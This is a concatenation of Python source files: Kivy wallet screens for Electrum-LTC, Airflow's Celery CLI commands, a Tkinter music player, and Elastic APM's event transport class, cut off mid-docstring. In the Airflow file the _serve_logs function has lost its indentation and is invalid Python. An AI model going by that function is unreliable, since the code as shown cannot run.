        # Fee selection / confirmation dialog; it calls back into send_tx.
        from .dialogs.confirm_tx_dialog import ConfirmTxDialog
        d = ConfirmTxDialog(self.app, invoice)
        d.open()
    def send_tx(self, tx, invoice, password):
        """Sign and broadcast (or display) a transaction built for an invoice.

        Called back by ConfirmTxDialog once the user has approved the fee.
        """
        if self.app.wallet.has_password() and password is None:
            return
        self.save_invoice(invoice)
        def on_success(tx):
            # broadcast fully-signed txs; show partially-signed ones instead
            if tx.is_complete():
                self.app.broadcast(tx)
            else:
                self.app.tx_dialog(tx)
        def on_failure(error):
            self.app.show_error(error)
        if self.app.wallet.can_sign(tx):
            self.app.show_info("Signing...")
            self.app.sign_tx(tx, password, on_success, on_failure)
        else:
            self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
    """Kivy screen for creating and listing incoming payment requests."""
    kvname = 'receive'

    def __init__(self, **kwargs):
        super(ReceiveScreen, self).__init__(**kwargs)
        # refresh the request list every 5 seconds
        Clock.schedule_interval(lambda dt: self.update(), 5)
        self.is_max = False  # not used for receiving (see app.amount_dialog)

    def expiry(self):
        # configured request expiration (presumably seconds — see config key)
        return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)

    def clear(self):
        # reset the request-creation form
        self.address = ''
        self.amount = ''
        self.message = ''
        self.lnaddr = ''

    def set_address(self, addr):
        self.address = addr

    def on_address(self, addr):
        # Kivy property observer: reflect any existing request for this
        # address in the form fields.
        req = self.app.wallet.get_request(addr)
        self.status = ''
        if req:
            self.message = req.get('memo', '')
            amount = req.get('amount')
            self.amount = self.app.format_amount_and_units(amount) if amount else ''
            status = req.get('status', PR_UNKNOWN)
            self.status = _('Payment received') if status == PR_PAID else ''

    def get_URI(self):
        """Return a BIP21 URI for the current form contents."""
        from electrum_ltc.util import create_bip21_uri
        amount = self.amount
        if amount:
            a, u = self.amount.split()
            assert u == self.app.base_unit
            # convert from the display unit to base units
            amount = Decimal(a) * pow(10, self.app.decimal_point())
        return create_bip21_uri(self.address, amount, self.message)

    def do_copy(self):
        uri = self.get_URI()
        self.app._clipboard.copy(uri)
        self.app.show_info(_('Request copied to clipboard'))

    def new_request(self, lightning):
        """Create a new payment request (lightning or on-chain) from the form."""
        amount = self.amount
        amount = self.app.get_amount(amount) if amount else 0
        message = self.message
        if lightning:
            key = self.app.wallet.lnworker.add_request(amount, message, self.expiry())
        else:
            addr = self.address or self.app.wallet.get_unused_address()
            if not addr:
                # non-deterministic wallets cannot derive fresh addresses,
                # so reuse the receiving address instead of failing
                if not self.app.wallet.is_deterministic():
                    addr = self.app.wallet.get_receiving_address()
                else:
                    self.app.show_info(_('No address available. Please remove some of your pending requests.'))
                    return
            self.address = addr
            req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
            self.app.wallet.add_payment_request(req)
            key = addr
        self.clear()
        self.update()
        self.app.show_request(lightning, key)

    def get_card(self, req: Invoice) -> Dict[str, Any]:
        """Build the data dict used to render one request card."""
        is_lightning = req.is_lightning()
        if not is_lightning:
            assert isinstance(req, OnchainInvoice)
            address = req.get_address()
            key = address
        else:
            assert isinstance(req, LNInvoice)
            key = req.rhash
            address = req.invoice
        amount = req.get_amount_sat()
        description = req.message
        status = self.app.wallet.get_request_status(key)
        status_str = req.get_status_str(status)
        ci = {}
        ci['screen'] = self
        ci['address'] = address
        ci['is_lightning'] = is_lightning
        ci['key'] = key
        ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
        ci['memo'] = description or _('No Description')
        ci['status'] = status
        ci['status_str'] = status_str
        return ci

    def update(self):
        # repopulate the list of unpaid requests, newest first
        if self.app.wallet is None:
            return
        _list = self.app.wallet.get_unpaid_requests()
        _list.reverse()
        requests_container = self.ids.requests_container
        requests_container.data = [self.get_card(item) for item in _list]

    def update_item(self, key, request):
        # refresh the status of a single card in place
        payments_container = self.ids.requests_container
        data = payments_container.data
        for item in data:
            if item['key'] == key:
                status = self.app.wallet.get_request_status(key)
                status_str = request.get_status_str(status)
                item['status'] = status
                item['status_str'] = status_str
        payments_container.data = data  # needed?
        payments_container.refresh_from_data()

    def show_item(self, obj):
        self.app.show_request(obj.is_lightning, obj.key)

    def expiration_dialog(self, obj):
        # let the user choose the default expiration for new requests
        from .dialogs.choice_dialog import ChoiceDialog
        def callback(c):
            self.app.electrum_config.set_key('request_expiry', c)
        d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
        d.open()
class TabbedCarousel(Factory.TabbedPanel):
    '''Custom TabbedPanel using a carousel used in the Main Screen
    '''
    carousel = ObjectProperty(None)

    def animate_tab_to_center(self, value):
        # Scroll the tab strip so the selected tab header is visible.
        scrlv = self._tab_strip.parent
        if not scrlv:
            return
        idx = self.tab_list.index(value)
        n = len(self.tab_list)
        if idx in [0, 1]:
            scroll_x = 1
        elif idx in [n-1, n-2]:
            scroll_x = 0
        else:
            # interpolate between the two ends of the strip
            scroll_x = 1. * (n - idx - 1) / (n - 1)
        mation = Factory.Animation(scroll_x=scroll_x, d=.25)
        mation.cancel_all(scrlv)
        mation.start(scrlv)

    def on_current_tab(self, instance, value):
        self.animate_tab_to_center(value)

    def on_index(self, instance, value):
        # carousel slide changed (e.g. by swiping): sync the tab header
        current_slide = instance.current_slide
        if not hasattr(current_slide, 'tab'):
            return
        tab = current_slide.tab
        ct = self.current_tab
        try:
            if ct.text != tab.text:
                carousel = self.carousel
                carousel.slides[ct.slide].dispatch('on_leave')
                self.switch_to(tab)
                carousel.slides[tab.slide].dispatch('on_enter')
        except AttributeError:
            current_slide.dispatch('on_enter')

    def switch_to(self, header):
        # we have to replace the functionality of the original switch_to
        if not header:
            return
        if not hasattr(header, 'slide'):
            # header without an associated slide: fall back to default
            # behavior and re-select the last tab
            header.content = self.carousel
            super(TabbedCarousel, self).switch_to(header)
            try:
                tab = self.tab_list[-1]
            except IndexError:
                return
            self._current_tab = tab
            tab.state = 'down'
            return
        carousel = self.carousel
        self.current_tab.state = "normal"
        header.state = 'down'
        self._current_tab = header
        # set the carousel to load the appropriate slide
        # saved in the screen attribute of the tab head
        slide = carousel.slides[header.slide]
        if carousel.current_slide != slide:
            carousel.current_slide.dispatch('on_leave')
            carousel.load_slide(slide)
            slide.dispatch('on_enter')

    def add_widget(self, widget, index=0):
        # CScreen children go into the carousel; everything else is a
        # normal TabbedPanel child
        if isinstance(widget, Factory.CScreen):
            self.carousel.add_widget(widget)
            return
        super(TabbedCarousel, self).add_widget(widget, index=index)
|
celery_command.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Celery command"""
from multiprocessing import Process
from typing import Optional
import daemon
import psutil
import sqlalchemy.exc
from celery import maybe_patch_concurrency # type: ignore[attr-defined]
from daemon.pidfile import TimeoutPIDLockFile
from lockfile.pidlockfile import read_pid_from_pidfile, remove_existing_pidfile
from airflow import settings
from airflow.configuration import conf
from airflow.executors.celery_executor import app as celery_app
from airflow.utils import cli as cli_utils
from airflow.utils.cli import setup_locations, setup_logging
from airflow.utils.serve_logs import serve_logs
# process name used for the pid/stdout/stderr/log file locations of the worker
WORKER_PROCESS_NAME = "worker"
@cli_utils.action_cli
def flower(args):
    """Starts Flower, Celery monitoring tool"""
    # base CLI options; optional flags appended below when given
    options = [
        "flower",
        conf.get('celery', 'BROKER_URL'),
        f"--address={args.hostname}",
        f"--port={args.port}",
    ]
    if args.broker_api:
        options.append(f"--broker-api={args.broker_api}")
    if args.url_prefix:
        options.append(f"--url-prefix={args.url_prefix}")
    if args.basic_auth:
        options.append(f"--basic-auth={args.basic_auth}")
    if args.flower_conf:
        options.append(f"--conf={args.flower_conf}")
    if args.daemon:
        # daemonize: detach and redirect stdout/stderr to configured files
        pidfile, stdout, stderr, _ = setup_locations(
            process="flower",
            pid=args.pid,
            stdout=args.stdout,
            stderr=args.stderr,
            log=args.log_file,
        )
        with open(stdout, "w+") as stdout, open(stderr, "w+") as stderr:
            ctx = daemon.DaemonContext(
                pidfile=TimeoutPIDLockFile(pidfile, -1),
                stdout=stdout,
                stderr=stderr,
            )
            with ctx:
                celery_app.start(options)
    else:
        celery_app.start(options)
def _serve_logs(skip_serve_logs: bool = False) -> Optional[Process]:
"""Starts serve_logs sub-process"""
if skip_serve_logs is False:
sub_proc = Process(target=serve_logs)
sub_proc.start()
return sub_proc
return None
def _run_worker(options, skip_serve_logs):
    # Optionally start the log-serving subprocess, run the Celery worker in
    # the foreground, and always clean up the subprocess on exit.
    sub_proc = _serve_logs(skip_serve_logs)
    try:
        celery_app.worker_main(options)
    finally:
        if sub_proc:
            sub_proc.terminate()
@cli_utils.action_cli
def worker(args):
    """Starts Airflow Celery worker"""
    # Disable connection pool so that celery worker does not hold an unnecessary db connection
    settings.reconfigure_orm(disable_connection_pool=True)
    if not settings.validate_session():
        raise SystemExit("Worker exiting, database connection precheck failed.")

    autoscale = args.autoscale
    skip_serve_logs = args.skip_serve_logs
    if autoscale is None and conf.has_option("celery", "worker_autoscale"):
        autoscale = conf.get("celery", "worker_autoscale")

    # Setup locations
    pid_file_path, stdout, stderr, log_file = setup_locations(
        process=WORKER_PROCESS_NAME,
        pid=args.pid,
        stdout=args.stdout,
        stderr=args.stderr,
        log=args.log_file,
    )

    if hasattr(celery_app.backend, 'ResultSession'):
        # Pre-create the database tables now, otherwise SQLA via Celery has a
        # race condition where one of the subprocesses can die with "Table
        # already exists" error, because SQLA checks for which tables exist,
        # then issues a CREATE TABLE, rather than doing CREATE TABLE IF NOT
        # EXISTS
        try:
            session = celery_app.backend.ResultSession()
            session.close()
        except sqlalchemy.exc.IntegrityError:
            # At least on postgres, trying to create a table that already exist
            # gives a unique constraint violation or the
            # "pg_type_typname_nsp_index" table. If this happens we can ignore
            # it, we raced to create the tables and lost.
            pass

    # backwards-compatible: https://github.com/apache/airflow/pull/21506#pullrequestreview-879893763
    celery_log_level = conf.get('logging', 'CELERY_LOGGING_LEVEL')
    if not celery_log_level:
        celery_log_level = conf.get('logging', 'LOGGING_LEVEL')

    # Setup Celery worker
    options = [
        'worker',
        '-O',
        'fair',
        '--queues',
        args.queues,
        '--concurrency',
        args.concurrency,
        '--hostname',
        args.celery_hostname,
        '--loglevel',
        celery_log_level,
        '--pidfile',
        pid_file_path,
    ]
    if autoscale:
        options.extend(['--autoscale', autoscale])
    if args.without_mingle:
        options.append('--without-mingle')
    if args.without_gossip:
        options.append('--without-gossip')

    if conf.has_option("celery", "pool"):
        pool = conf.get("celery", "pool")
        options.extend(["--pool", pool])
        # Celery pools of type eventlet and gevent use greenlets, which
        # requires monkey patching the app:
        # https://eventlet.net/doc/patching.html#monkey-patch
        # Otherwise task instances hang on the workers and are never
        # executed.
        maybe_patch_concurrency(['-P', pool])

    if args.daemon:
        # Run Celery worker as daemon
        handle = setup_logging(log_file)
        with open(stdout, 'w+') as stdout_handle, open(stderr, 'w+') as stderr_handle:
            # BUGFIX: `umask` was previously only assigned when args.umask was
            # truthy, but was passed unconditionally to DaemonContext, raising
            # NameError whenever --umask was not supplied. Only pass it when set.
            ctx_kwargs = {
                'files_preserve': [handle],
                'stdout': stdout_handle,
                'stderr': stderr_handle,
            }
            if args.umask:
                # umask is given as an octal string on the CLI
                ctx_kwargs['umask'] = int(args.umask, 8)
            ctx = daemon.DaemonContext(**ctx_kwargs)
            with ctx:
                _run_worker(options=options, skip_serve_logs=skip_serve_logs)
    else:
        # Run Celery worker in the same process
        _run_worker(options=options, skip_serve_logs=skip_serve_logs)
@cli_utils.action_cli
def stop_worker(args):
    """Sends SIGTERM to Celery worker"""
    # Resolve the pid file: an explicit --pid wins over the default location.
    pid_file_path = args.pid
    if not pid_file_path:
        pid_file_path, _, _, _ = setup_locations(process=WORKER_PROCESS_NAME)
    pid = read_pid_from_pidfile(pid_file_path)
    if pid:
        # Ask the worker process to shut down gracefully.
        psutil.Process(pid).terminate()
    # Clean up the stale pid file either way.
    remove_existing_pidfile(pid_file_path)
|
musicPlayer.py | import os
import threading
import time
import tkinter.messagebox
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from ttkthemes import themed_tk as tk
from mutagen.mp3 import MP3
from pygame import mixer
root = tk.ThemedTk()
# BUGFIX: the `//`-style comments below were not valid Python (SyntaxError);
# converted to `#` comments.
root.get_themes()  # Returns a list of all themes that can be set
root.set_theme("radiance")  # Sets an available theme

# Fonts - Arial (corresponds to Helvetica), Courier New (Courier), Comic Sans MS, Fixedsys,
# MS Sans Serif, MS Serif, Symbol, System, Times New Roman (Times), and Verdana
#
# Styles - normal, bold, roman, italic, underline, and overstrike.
statusbar = ttk.Label(root, text="Welcome to Melody", relief=SUNKEN, anchor=W, font='Times 10 italic')
statusbar.pack(side=BOTTOM, fill=X)

# Create the menubar
menubar = Menu(root)
root.config(menu=menubar)

# Create the submenu
subMenu = Menu(menubar, tearoff=0)

playlist = []
# playlist - contains the full path + filename
# playlistbox - contains just the filename
# Fullpath + filename is required to play the music inside play_music load function
def browse_file():
    # Ask the user for a file, add it to the playlist and queue it for playback.
    global filename_path
    filename_path = filedialog.askopenfilename()
    add_to_playlist(filename_path)
    mixer.music.queue(filename_path)
def add_to_playlist(filename):
    """Insert a song at the top of the visible listbox (basename only) and
    of the backing playlist (full path, needed for loading the file)."""
    # BUGFIX: the full path was previously read from the global
    # `filename_path` instead of the `filename` argument, so the function
    # only worked when called right after browse_file().
    index = 0
    playlistbox.insert(index, os.path.basename(filename))
    playlist.insert(index, filename)
menubar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)

def about_us():
    tkinter.messagebox.showinfo('About Melody', 'This is a music player build using Python Tkinter by @attreyabhatt')

subMenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About Us", command=about_us)

# BUGFIX: `//` is not a comment in Python; converted to `#` comments.
mixer.init()  # initializing the mixer
root.title("Melody")
root.iconbitmap(r'images/melody.ico')

# Root Window - StatusBar, LeftFrame, RightFrame
# LeftFrame - The listbox (playlist)
# RightFrame - TopFrame,MiddleFrame and the BottomFrame
leftframe = Frame(root)
leftframe.pack(side=LEFT, padx=30, pady=30)

playlistbox = Listbox(leftframe)
playlistbox.pack()

addBtn = ttk.Button(leftframe, text="+ Add", command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
    """Remove the selected song from the listbox and the playlist."""
    selection = playlistbox.curselection()
    if not selection:
        # BUGFIX: previously raised IndexError when nothing was selected
        return
    selected_song = int(selection[0])
    playlistbox.delete(selected_song)
    playlist.pop(selected_song)
# Playlist delete button, next to the Add button
delBtn = ttk.Button(leftframe, text="- Del", command=del_song)
delBtn.pack(side=LEFT)
# Right-hand side of the window: labels and playback controls
rightframe = Frame(root)
rightframe.pack(pady=30)
topframe = Frame(rightframe)
topframe.pack()
# Labels for total song length and elapsed playback time
lengthlabel = ttk.Label(topframe, text='Total Length : --:--')
lengthlabel.pack(pady=5)
currenttimelabel = ttk.Label(topframe, text='Current Time : --:--', relief=GROOVE)
currenttimelabel.pack()
def show_details(play_song):
    """Show the total length of the song and start the elapsed-time counter."""
    file_data = os.path.splitext(play_song)
    if file_data[1] == '.mp3':
        audio = MP3(play_song)
        total_length = audio.info.length
    else:
        # non-mp3 files: let pygame compute the length
        a = mixer.Sound(play_song)
        total_length = a.get_length()
    # div - total_length/60, mod - total_length % 60
    # (BUGFIX: this comment previously used `//`, which is a SyntaxError)
    mins, secs = divmod(total_length, 60)
    mins = round(mins)
    secs = round(secs)
    timeformat = '{:02d}:{:02d}'.format(mins, secs)
    lengthlabel['text'] = "Total Length" + ' - ' + timeformat
    # count elapsed time in a background thread so the UI stays responsive
    t1 = threading.Thread(target=start_count, args=(total_length,))
    t1.start()
def start_count(t):
    """Update the 'Current Time' label once a second until the song ends.

    mixer.music.get_busy() returns False once playback stops, which
    terminates the loop.
    """
    global paused
    current_time = 0
    while current_time <= t and mixer.music.get_busy():
        if paused:
            # BUGFIX: sleep while paused; a bare `continue` busy-spun the CPU
            time.sleep(0.3)
            continue
        mins, secs = divmod(current_time, 60)
        mins = round(mins)
        secs = round(secs)
        timeformat = '{:02d}:{:02d}'.format(mins, secs)
        currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
        time.sleep(1)
        current_time += 1
def play_music():
    """Resume if paused, otherwise (re)start the selected playlist entry."""
    global paused
    if paused:
        mixer.music.unpause()
        statusbar['text'] = "Music Resumed"
        paused = FALSE
    else:
        try:
            stop_music()
            time.sleep(1)
            selected_song = playlistbox.curselection()
            selected_song = int(selected_song[0])
            play_it = playlist[selected_song]
            mixer.music.load(play_it)
            mixer.music.play()
            statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
            show_details(play_it)
        except Exception:
            # BUGFIX: was a bare `except:`, which also traps
            # KeyboardInterrupt/SystemExit
            tkinter.messagebox.showerror('File not found', 'Melody could not find the file. Please check again.')
def stop_music():
    """Stop playback and clear the paused flag."""
    # BUGFIX: `global` was missing, so `paused = FALSE` only created a dead
    # local variable and the module-level pause flag was never reset.
    global paused
    mixer.music.stop()
    statusbar['text'] = "Music Stopped"
    paused = FALSE
def pause_music():
    # Pause playback and remember it, so play_music() resumes instead of restarting.
    global paused
    paused = TRUE
    mixer.music.pause()
    statusbar['text'] = "Music Paused"
def rewind_music():
    # 'Rewind' simply restarts the selected song from the beginning.
    play_music()
    statusbar['text'] = "Music Rewinded"
def set_vol(val):
    """Volume-scale callback: map the 0-100 slider value to mixer's 0.0-1.0."""
    volume = float(val) / 100
    mixer.music.set_volume(volume)
    # set_volume of mixer takes value only from 0 to 1. Example - 0, 0.1,0.55,0.54.0.99,1
    # (BUGFIX: this comment previously used `//`, which is a SyntaxError)

muted = FALSE
def mute_music():
    """Toggle mute: switch between volume 0 and a fixed 70%, updating the
    button icon and the slider. (BUGFIX: `//` comments converted to `#`.)"""
    global muted
    if muted:  # Unmute the music
        mixer.music.set_volume(0.7)
        volumeBtn.configure(image=volumePhoto)
        scale.set(70)
        muted = FALSE
    else:  # mute the music
        mixer.music.set_volume(0)
        volumeBtn.configure(image=mutePhoto)
        scale.set(0)
        muted = TRUE
# Middle frame holds the transport buttons (play / stop / pause)
middleframe = Frame(rightframe)
middleframe.pack(pady=30, padx=30)

playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music)
playBtn.grid(row=0, column=0, padx=10)

stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0, column=1, padx=10)

pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music)
pauseBtn.grid(row=0, column=2, padx=10)

# Bottom Frame for volume, rewind, mute etc.
# (BUGFIX: this comment previously used `//`, which is a SyntaxError)
bottomframe = Frame(rightframe)
bottomframe.pack()

rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music)
rewindBtn.grid(row=0, column=0)

mutePhoto = PhotoImage(file='images/mute.png')
volumePhoto = PhotoImage(file='images/volume.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)
volumeBtn.grid(row=0, column=1)

scale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(70)  # implement the default value of scale when music player starts
mixer.music.set_volume(0.7)
scale.grid(row=0, column=2, pady=15, padx=30)
def on_closing():
    # Stop playback before destroying the window so the mixer shuts down cleanly.
    stop_music()
    root.destroy()

# Intercept the window-manager close button, then enter the Tk main loop.
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
|
base.py | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import gzip
import io
import os
import queue as _queue
import random
import sys
import threading
import time
import timeit
from collections import defaultdict
from elasticapm.utils import json_encoder
from elasticapm.utils.logging import get_logger
from elasticapm.utils.threading import ThreadManager
logger = get_logger("elasticapm.transport")
class Transport(ThreadManager):
    """
    All transport implementations need to subclass this class
    You must implement a send method..
    """

    async_mode = False

    def __init__(
        self,
        client,
        compress_level=5,
        json_serializer=json_encoder.dumps,
        queue_chill_count=500,
        queue_chill_time=1.0,
        processors=None,
        **kwargs
    ):
        """
        Create a new Transport instance

        :param client: the client instance this transport sends data for
        :param compress_level: GZip compress level. If zero, no GZip compression will be used
        :param json_serializer: serializer to use for JSON encoding
        :param queue_chill_count: queue size below which consumer notifications are throttled
        :param queue_chill_time: max seconds between consumer notifications while throttled
        :param processors: optional list of callables applied to each event before sending
        :param kwargs:
        """
        self.client = client
        self.state = TransportState()
        self._metadata = None
        # clamp the compress level into gzip's valid 0..9 range
        self._compress_level = min(9, max(0, compress_level if compress_level is not None else 0))
        self._json_serializer = json_serializer
        self._queued_data = None
        self._event_queue = self._init_event_queue(chill_until=queue_chill_count, max_chill_time=queue_chill_time)
        self._is_chilled_queue = isinstance(self._event_queue, ChilledQueue)
        self._thread = None
        self._last_flush = timeit.default_timer()
        self._counts = defaultdict(int)
        self._flushed = threading.Event()
        self._closed = False
        self._processors = processors if processors is not None else []
        super(Transport, self).__init__()
        self.start_stop_order = sys.maxsize  # ensure that the transport thread is always started/stopped last

    @property
    def _max_flush_time(self):
        # api_request_time is configured in milliseconds
        return self.client.config.api_request_time / 1000.0 if self.client else None

    @property
    def _max_buffer_size(self):
        return self.client.config.api_request_size if self.client else None

    def queue(self, event_type, data, flush=False):
        """Enqueue an event for the processor thread; never blocks.

        Events are dropped (with a debug log) when the queue is full.
        """
        try:
            self._flushed.clear()
            # "close" events and explicit flushes must wake the consumer immediately
            kwargs = {"chill": not (event_type == "close" or flush)} if self._is_chilled_queue else {}
            self._event_queue.put((event_type, data, flush), block=False, **kwargs)
        except _queue.Full:
            logger.debug("Event of type %s dropped due to full event queue", event_type)

    def _process_queue(self):
        """Main loop of the event processor thread: drain the queue into a
        gzip buffer and flush it on timeout, size limit, explicit flush,
        or close."""
        # Rebuild the metadata to capture new process information
        if self.client:
            self._metadata = self.client.build_metadata()
        buffer = self._init_buffer()
        buffer_written = False
        # add some randomness to timeout to avoid stampedes of several workers that are booted at the same time
        max_flush_time = self._max_flush_time * random.uniform(0.9, 1.1) if self._max_flush_time else None
        while True:
            since_last_flush = timeit.default_timer() - self._last_flush
            # take max flush time into account to calculate timeout
            timeout = max(0, max_flush_time - since_last_flush) if max_flush_time else None
            timed_out = False
            try:
                event_type, data, flush = self._event_queue.get(block=True, timeout=timeout)
            except _queue.Empty:
                event_type, data, flush = None, None, None
                timed_out = True
            if event_type == "close":
                if buffer_written:
                    try:
                        self._flush(buffer)
                    except Exception as exc:
                        logger.error(
                            "Exception occurred while flushing the buffer "
                            "before closing the transport connection: {0}".format(exc)
                        )
                self._flushed.set()
                return  # time to go home!
            if data is not None:
                data = self._process_event(event_type, data)
                if data is not None:
                    if not buffer_written:
                        # Write metadata just in time to allow for late metadata changes (such as in lambda)
                        self._write_metadata(buffer)
                    buffer.write((self._json_serializer({event_type: data}) + "\n").encode("utf-8"))
                    buffer_written = True
                    self._counts[event_type] += 1
            queue_size = 0 if buffer.fileobj is None else buffer.fileobj.tell()
            forced_flush = flush
            if forced_flush:
                logger.debug("forced flush")
            elif timed_out or timeout == 0:
                # update last flush time, as we might have waited for a non trivial amount of time in
                # _event_queue.get()
                since_last_flush = timeit.default_timer() - self._last_flush
                logger.debug(
                    "flushing due to time since last flush %.3fs > max_flush_time %.3fs",
                    since_last_flush,
                    max_flush_time,
                )
                flush = True
            elif self._max_buffer_size and queue_size > self._max_buffer_size:
                logger.debug(
                    "flushing since queue size %d bytes > max_queue_size %d bytes", queue_size, self._max_buffer_size
                )
                flush = True
            if flush:
                if buffer_written:
                    self._flush(buffer, forced_flush=forced_flush)
                elif forced_flush and "/localhost:" in self.client.config.server_url:
                    # No data on buffer, but due to manual flush we should send
                    # an empty payload with flushed=true query param, but only
                    # to a local APM server (or lambda extension)
                    self.send(None, flushed=True)
                self._last_flush = timeit.default_timer()
                buffer = self._init_buffer()
                buffer_written = False
                max_flush_time = self._max_flush_time * random.uniform(0.9, 1.1) if self._max_flush_time else None
                self._flushed.set()

    def _process_event(self, event_type, data):
        """Run the event through all applicable processors; return None if
        the event is dropped (by a processor or due to an exception)."""
        # Run the data through processors
        for processor in self._processors:
            if not hasattr(processor, "event_types") or event_type in processor.event_types:
                try:
                    data = processor(self.client, data)
                    if not data:
                        logger.debug(
                            "Dropped event of type %s due to processor %s.%s",
                            event_type,
                            processor.__module__,
                            processor.__name__,
                        )
                        return None
                except Exception:
                    logger.warning(
                        "Dropped event of type %s due to exception in processor %s.%s",
                        event_type,
                        processor.__module__,
                        processor.__name__,
                        exc_info=True,
                    )
                    return None
        return data

    def _init_buffer(self):
        # fresh gzip stream over an in-memory buffer for the next batch
        buffer = gzip.GzipFile(fileobj=io.BytesIO(), mode="w", compresslevel=self._compress_level)
        return buffer

    def _write_metadata(self, buffer):
        # metadata is always the first ndjson line of a batch
        data = (self._json_serializer({"metadata": self._metadata}) + "\n").encode("utf-8")
        buffer.write(data)

    def add_metadata(self, data):
        """
        Add additional metadata do the dictionary

        Only used in specific instances where metadata relies on data we only
        have at request time, such as for lambda metadata

        Metadata is only merged one key deep.
        """
        if self._metadata is not None:
            # Merge one key deep
            for key, val in data.items():
                if isinstance(val, dict) and key in self._metadata and isinstance(self._metadata[key], dict):
                    self._metadata[key].update(val)
                else:
                    self._metadata[key] = val
        else:
            self._metadata = data

    def _init_event_queue(self, chill_until, max_chill_time):
        # some libraries like eventlet monkeypatch queue.Queue and switch out the implementation.
        # In those cases we can't rely on internals of queue.Queue to be there, so we simply use
        # their queue and forgo the optimizations of ChilledQueue. In the case of eventlet, this
        # isn't really a loss, because the main reason for ChilledQueue (avoiding context switches
        # due to the event processor thread being woken up all the time) is not an issue.
        if all(
            (
                hasattr(_queue.Queue, "not_full"),
                hasattr(_queue.Queue, "not_empty"),
                hasattr(_queue.Queue, "unfinished_tasks"),
            )
        ):
            return ChilledQueue(maxsize=10000, chill_until=chill_until, max_chill_time=max_chill_time)
        else:
            return _queue.Queue(maxsize=10000)

    def _flush(self, buffer, forced_flush=False):
        """
        Flush the queue. This method should only be called from the event processing queue
        :param buffer: the gzip buffer to finalize and send
        :param forced_flush: whether this flush was explicitly requested
        :return: None
        """
        if not self.state.should_try():
            logger.error("dropping flushed data due to transport failure back-off")
        else:
            fileobj = buffer.fileobj  # get a reference to the fileobj before closing the gzip file
            buffer.close()
            # StringIO on Python 2 does not have getbuffer, so we need to fall back to getvalue
            data = fileobj.getbuffer() if hasattr(fileobj, "getbuffer") else fileobj.getvalue()
            try:
                self.send(data, forced_flush=forced_flush)
                self.handle_transport_success()
            except Exception as e:
                self.handle_transport_fail(e)

    def start_thread(self, pid=None):
        # (Re)start the event processor thread, e.g. at startup or after a fork
        super(Transport, self).start_thread(pid=pid)
        if (not self._thread or self.pid != self._thread.pid) and not self._closed:
            self.handle_fork()
            try:
                self._thread = threading.Thread(target=self._process_queue, name="eapm event processor thread")
                self._thread.daemon = True
                self._thread.pid = self.pid
                self._thread.start()
            except RuntimeError:
                # interpreter is shutting down; no new threads can be started
                pass

    def send(self, data, forced_flush=False):
        """
        You need to override this to do something with the actual
        data. Usually - this is sending to a server
        """
        raise NotImplementedError

    def close(self):
        """
        Cleans up resources and closes connection
        :return:
        """
        if self._closed or (not self._thread or self._thread.pid != os.getpid()):
            return
        self._closed = True
        self.queue("close", None)
        if not self._flushed.wait(timeout=self._max_flush_time):
            logger.error("Closing the transport connection timed out.")

    stop_thread = close

    def flush(self):
        """
        Trigger a flush of the queue.
